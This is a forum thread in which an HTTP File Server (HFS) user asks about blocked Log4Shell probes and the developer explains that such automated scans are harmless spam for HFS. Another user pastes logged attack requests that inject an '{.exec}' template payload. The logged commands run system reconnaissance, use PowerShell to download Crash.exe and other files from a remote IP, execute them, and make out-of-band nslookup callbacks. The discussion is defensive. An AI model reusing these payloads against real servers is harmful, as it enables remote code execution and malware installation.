Protection against network attacks

[ShadowOffDeath]

Questi attacchi sono apparsi in modo molto strano, non ricordo quale delle ultime versioni, quando è stata pubblicata per un aggiornamento.
come sempre installate le versioni più recenti e stabili di HFS.
Dopo alcune ricerche ho trovato https://www.ip2location.com/demo/92.118.39.120
https://www.ip2location.com/demo/194.59.31.163
Nazione Romania [RO]
Regione Bucarest
Città Bucarest
Nazione Francia [FR]
Regione Ile-de-France
Città Tremblay-en-France
La mia domanda a Massimo o a qualsiasi altro esperto di software è dove sia il problema e perché questi attacchi siano comparsi proprio adesso. Mi è chiaro che ho aperto la porta 80, altrimenti il programma non funzionerà, ma dove dovrei cercare la soluzione per migliorare le impostazioni del mio router, Antivirus, Windows 10 o qualcosa nell'HFS stesso non sono un esperto per tracciare ogni riga del codice scritto ecco perché sollevo qui l'argomento e la domanda.
Non voglio rimuovere il programma e chiudere la porta 80, ma se non viene trovata una soluzione ragionevole al problema e gli attacchi continuano, potrei abbandonare il programma a causa del rischio che accada qualcosa di spiacevole o irreparabile ai miei file o dati.

These attacks appeared very strangely, I don't remember which of the last versions, when it was published for an update.
as always installed the latest and stable versions of HFS.
After some research I found https://www.ip2location.com/demo/92.118.39.120
https://www.ip2location.com/demo/194.59.31.163
Country Romania [RO]
Region Bucuresti
City Bucharest
Country France [FR]
Region Ile-de-France
City Tremblay-en-France
My question to Massimo or any other software expert is where the problem is and why these attacks have appeared now. It is clear to me that I have opened port 80, otherwise the program will not work, but where should I look for the solution in improving the settings of my router, Antivirus, Windows 10 or something in the HFS itself I am not an expert to trace every line of the written code that's why I raise the topic and the question here.

Component: Protection against network attacks
Result description: Blocked
Name: Intrusion.Generic.CVE-2021-44228.a
Object: TCP from 194.59.31.163 to 192.168.50.8:80
Additional: 192.168.50.8
Database Publication Date: 5/15/2024 10:43:00 AM

Component: Protection against network attacks
Result description: Blocked
Name: Intrusion.Generic.CVE-2021-44228.a
Object: TCP from 92.118.39.120 to 192.168.50.8:80
Additional: 192.168.50.8
Database Publication Date: 5/11/2024 10:46:00 PM

Component: Protection against network attacks
Result description: Blocked
Name: Intrusion.Generic.CVE-2021-44228.a
Object: TCP from 92.118.39.120 to 192.168.50.8:80
Additional: 192.168.50.8
Database Publication Date: 5/11/2024 3:22:00 AM
I don't want to remove the program and close port 80, but if no reasonable solution to the problem is found and the attacks continue, I may abandon the program because of the risks of something unpleasant or irreparable happening to my files or data.
P.S.
I use The routher is TUF Gaming AX4200
https://www.asus.com/networking-iot-servers/wifi-routers/asus-gaming-routers/tuf-gaming-ax4200/

[rejetto]

"why now". These attacks are automatic, swiping the whole internet, like waves in the ocean. Before or later you are subjected.
The ones you linked here are about a bug in a java software. There's no java here. This mean that those attacks cannot work, and can be considered just spam.
https://github.com/rejetto/hfs/wiki/Tip:-avoid-spam

In 0.53 i introduced a new feature that will filter some of the spam out of your log, because I understand that people are scared.

I prefer if you post just english instead of italian+english :) unless you are italian and afraid your english may not be as much as clear

[Cauf]

3:10:56 p. m. 158.247.209.24:55006 Requested GET /?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
3:38:44 p. m. 3.38.212.132:52553 Requested GET /?n=

&cmd=systeminfo&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
3:38:59 p. m. 3.38.212.132:52559 Requested GET //?n=
&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/Crash.exe+-OutFile+c:\users\public\Crash.exe&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
3:39:14 p. m. 3.38.212.132:52562 Requested GET /?n=
&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/WindowsWatcher.key+-OutFile+c:\users\public\WindowsWatcher.key&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
3:39:29 p. m. 3.38.212.132:52563 Requested GET /?n=
&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/Roboform.dll+-OutFile+c:\users\public\Roboform.dll&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
3:39:34 p. m. 3.38.212.132:52567 Requested GET /?n=
&cmd=c:\users\public\Crash.exe&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
4:07:21 p. m. 64.176.12.204:42022 Requested GET /?n=
&cmd=tasklist&search=%xxx%url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
4:25:59 p. m. 13.88.158.175:40256 Requested GET /
5:49:49 p. m. 103.167.16.179:54819 Requested GET /
6:08:32 p. m. 103.167.16.179:59267 Requested GET /?n=
&cmd=nslookup+cpkdgb3t2b0hqj57fg4g8o348nrwj51uk.oast.live&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
6:08:38 p. m. 103.167.16.179:59209 Requested GET /?n=
&cmd=nslookup+cpkdgb3t2b0hqj57fg4g8o348nrwj51uk.oast.live&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

[rejetto]

@Cauf with 0.53 you won't see this anymore